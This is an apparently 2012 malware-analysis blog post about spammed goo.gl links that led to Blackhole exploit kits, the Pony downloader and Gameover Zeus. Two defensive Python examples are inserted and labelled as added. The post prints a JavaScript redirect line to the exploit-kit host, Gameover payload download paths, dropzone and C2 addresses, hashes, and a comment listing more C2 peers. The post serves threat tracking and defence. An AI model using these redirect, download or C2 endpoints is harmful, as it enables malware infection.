Spammed Goo.gl Links – Part 3

Today we encountered interesting hostile links masked via Google's link-shortening service goo.gl. The samples we found included the following shortened links, which redirected to Blackhole Exploit kits before dropping Gameover Zeus.
The screenshots below show the geographic breakdown of the victims who clicked on each of those shortened links.

URL: hxxp://goo[.]gl /hvQjQ
Original URL: hxxp://9el34ccw.physiorepeat[.]ru /index.html
[Screenshot: goo.gl click statistics for hvQjQ]

URL: hxxp://goo[.]gl /157Qy
Original URL: hxxp://v8ut.physiorepeat[.]ru /index.html
[Screenshot: goo.gl click statistics for 157Qy]

URL: hxxp://goo[.]gl /WR9Gg
Original URL: hxxp://zgj.physiorepeat[.]ru /index.html

URL: hxxp://goo[.]gl /meCTY
Original URL: hxxp://3n8261.physiorepeat[.]ru /index.html

URL: hxxp://goo[.]gl /6HfNr
Original URL: hxxp://3n8261.physiorepeat[.]ru /index.html

URL: hxxp://goo[.]gl /6Owra
Original URL: hxxp://3n8261.physiorepeat[.]ru /index.html

URL: hxxp://goo[.]gl /y4h4n
Original URL: hxxp://3n8261.physiorepeat[.]ru /index.html

URL: hxxp://goo[.]gl /hgE4I
Original URL: hxxp://3n8261.physiorepeat[.]ru /index.html

URL: hxxp://goo[.]gl /BSNL9
Original URL: hxxp://3n8261.physiorepeat[.]ru /index.html

URL: hxxp://goo[.]gl /cExU2
Original URL: hxxp://wpwoxse0.kickedmember[.]ru /index.html

URL: hxxp://goo[.]gl /LVIfU
Original URL: hxxp://xc8vrqg.bromleyclergy[.]ru /index.html

URL: hxxp://goo[.]gl /LrfrJ
Original URL: hxxp://7lox0.kubicabridges[.]ru /index.html

These statistics show that no individual spam message appears to have been sent to a large audience: on average, each spam message victimized only 15-20 users.

This is particularly interesting not only because it lets us study the geographic distribution of victims, but also because these links were related to the ongoing Gameover Zeus distribution campaign that we have been continuously reporting here.

Each of these shortened links redirected victims to Blackhole Exploit kits hosted on 9 different subdomains at physiorepeat[.]ru, 1 at kubicabridges[.]ru, 1 at bromleyclergy[.]ru and 1 at kickedmember[.]ru.

These domains are hosted at the following IP addresses on a fast-flux infrastructure that sets the A records to a TTL of 20 seconds:

87.247.43.96
92.47.86.48
92.126.240.211
94.21.105.45
95.59.14.58
95.59.180.59
95.78.134.184
95.190.123.232
95.191.33.20
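A 20-second TTL with answers rotating through residential-looking addresses in unrelated networks is the classic fast-flux signature described above. The following is an added example (not code from the original post) showing how a defender could apply that heuristic to passive-DNS style observations. The log lines are constructed for illustration; the names and addresses are taken from this post, the timestamps and the benign control record are assumptions, and the thresholds are illustrative rather than authoritative.

```python
# Fast-flux heuristic over passive-DNS observations (added example, not from the post).
# Each observation is one A-record answer seen on the wire: time, name, address, TTL.
from collections import defaultdict
from typing import Dict, List, NamedTuple


class DnsObservation(NamedTuple):
    ts: int        # epoch seconds when the answer was observed
    qname: str     # queried name
    rdata: str     # A record value
    ttl: int       # TTL advertised in the answer


# Constructed log lines: "<epoch> <qname> A <rdata> <ttl>".
# The first name and addresses come from the post; www.example.com is a benign control.
SAMPLE_LOG = """\
1331251200 3n8261.physiorepeat.ru A 87.247.43.96 20
1331251220 3n8261.physiorepeat.ru A 92.47.86.48 20
1331251240 3n8261.physiorepeat.ru A 95.59.14.58 20
1331251260 3n8261.physiorepeat.ru A 95.191.33.20 20
1331251280 3n8261.physiorepeat.ru A 94.21.105.45 20
1331251200 www.example.com A 192.0.2.10 3600
1331254800 www.example.com A 192.0.2.10 3600
"""


def parse_log(text: str) -> List[DnsObservation]:
    """Parse the constructed log format, skipping blank or non-A lines."""
    out = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 5 or parts[2] != "A":
            continue
        ts, qname, _, rdata, ttl = parts
        out.append(DnsObservation(int(ts), qname.lower(), rdata, int(ttl)))
    return out


def summarize(observations: List[DnsObservation]) -> Dict[str, Dict[str, int]]:
    """Per-name summary: distinct addresses, distinct /16 prefixes, lowest TTL, time span."""
    by_name: Dict[str, List[DnsObservation]] = defaultdict(list)
    for o in observations:
        by_name[o.qname].append(o)
    summary = {}
    for name, obs in by_name.items():
        ips = {o.rdata for o in obs}
        # /16 prefixes are a cheap stand-in for "spread across unrelated networks";
        # ASN lookups would be stronger but need external data.
        prefixes = {".".join(o.rdata.split(".")[:2]) for o in obs}
        summary[name] = {
            "distinct_ips": len(ips),
            "distinct_slash16": len(prefixes),
            "min_ttl": min(o.ttl for o in obs),
            "span_seconds": max(o.ts for o in obs) - min(o.ts for o in obs),
        }
    return summary


def is_fast_flux(stats: Dict[str, int], max_ttl: int = 60,
                 min_ips: int = 4, min_prefixes: int = 3) -> bool:
    """Flag a name when the TTL is tiny AND the answers are both many and widely spread.
    Low TTL alone is not enough: CDNs also use short TTLs, but their addresses cluster."""
    return (stats["min_ttl"] <= max_ttl
            and stats["distinct_ips"] >= min_ips
            and stats["distinct_slash16"] >= min_prefixes)


def flagged_names(observations: List[DnsObservation], **thresholds) -> List[str]:
    """Return the sorted list of names that match the fast-flux heuristic."""
    return sorted(name for name, stats in summarize(observations).items()
                  if is_fast_flux(stats, **thresholds))


if __name__ == "__main__":
    obs = parse_log(SAMPLE_LOG)
    for name, stats in summarize(obs).items():
        print(name, stats, "FLUX" if is_fast_flux(stats) else "ok")
    print("flagged:", flagged_names(obs))
```

The thresholds are deliberately conservative; in practice you would tune `min_ips` and the observation window to your resolver's traffic volume, and the `/16` check is a rough proxy for network diversity that an ASN lookup would replace.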

These JavaScript redirectors contain the following document.location script, which sends victims to a Blackhole Exploit kit at 64.150.166.199:

document.location='hxxp://64.150.166.199/showthread.php?t=72d268be707a5fb7';
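For a responder, the useful output of a page like this is the redirect target, pulled out and defanged so it can go into a report or blocklist without being clickable. The following is an added example (not code from the original post) that extracts `document.location` / `window.location` assignments from a page body and converts between live and defanged forms. The sample page body is constructed; its target URL is the one quoted in the post.

```python
# Extract JavaScript redirect targets and defang them for reporting
# (added example, not from the original post).
import re
from typing import List

# Constructed page body modelled on the redirector described in the post.
SAMPLE_REDIRECTOR = """<html><head><script>
document.location='http://64.150.166.199/showthread.php?t=72d268be707a5fb7';
</script></head><body></body></html>"""

# Matches document.location, window.location and the .href variants, with either quote style.
LOCATION_RE = re.compile(
    r"""(?:document|window)\.location(?:\.href)?\s*=\s*(['"])(.*?)\1""",
    re.IGNORECASE,
)


def extract_redirect_targets(body: str) -> List[str]:
    """Return every string literal assigned to a location property, in order of appearance."""
    return [m.group(2) for m in LOCATION_RE.finditer(body)]


def defang(url: str) -> str:
    """http -> hxxp and '.' -> '[.]' in the host part only, so the path stays readable."""
    url = re.sub(r"^http", "hxxp", url, flags=re.IGNORECASE)
    m = re.match(r"^(hxxps?://)([^/]+)(.*)$", url)
    if not m:
        return url
    scheme, host, rest = m.groups()
    return scheme + host.replace(".", "[.]") + rest


def refang(url: str) -> str:
    """Inverse of defang, for feeding an indicator back into a tool that needs the live form."""
    url = url.replace("[.]", ".")
    return re.sub(r"^hxxp", "http", url, flags=re.IGNORECASE)


def defanged_targets(body: str) -> List[str]:
    """Convenience wrapper: extract and defang in one step."""
    return [defang(u) for u in extract_redirect_targets(body)]


if __name__ == "__main__":
    for target in defanged_targets(SAMPLE_REDIRECTOR):
        print(target)
```

This only catches targets written as a plain string literal; redirectors that build the URL from concatenated fragments or decode it at runtime need a JavaScript sandbox rather than a regex, which is worth remembering before trusting an empty result.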

The exploit kit first downloaded the Pony downloader from the following location:

64.150.166.199 /q.php?f=cec72&e=2

File: contacts.exe
MD5: 8e4094a1438ab280df2e0796a705e52a
Size: 95,864 bytes

The Pony downloader posts to its dropzone at 173.246.39.218 /pony/gate.php.
This Pony downloader variant was also configured to download Gameover Zeus binaries from the following locations:

swanhillproperties[.]com /d7oBRwFA/2UDwW06.exe
ftp.filmsan.com[.]tr /qX9h9SCd/4CZNXUJh.exe

File: 2UDwW06.exe
MD5: 4bf9cca55ff576e91c1fd4a2c2d35ff1
Size: 278,528 bytes
Timestamp: 2012:03:05 19:31:42+01:00
Other: This file is digitally signed by ‘Ru3Ue4SyIDSA’
Company Name: 2q3wet Corporation
File Description: Windows TaskManager
Internal Name: taskmgr
Legal Copyright: Copyright (C) 2q3wet Corp. 1991-1999
Original Filename: taskmgr.exe

This Gameover variant is detected by 4 of 43 AV vendors on VirusTotal. It posts to a dropzone at 69.10.118.248:15539 /index.php and had a CID of "3004".


One Comment

  1. Posted March 9, 2012 at 9:31 pm

    Saw similar traffic today; the md5 84190b13919708320b6773fcd9d916d2 for Gameover is different, and saw traffic via UDP to the following IP addresses:

    24.176.16.81:24144
    178.19.25.92:25939
    114.148.255.187:25178
    70.184.221.22:25229
    74.140.168.196:16814
    89.45.103.26:14406
    86.123.195.34:27367
    178.54.12.177:18367
    99.90.38.37:17195
    65.189.51.255:19297
    76.178.80.190:20276
    79.4.241.217:29455
    184.226.209.60:13724
    111.253.191.237:19733
    94.62.27.189:28510
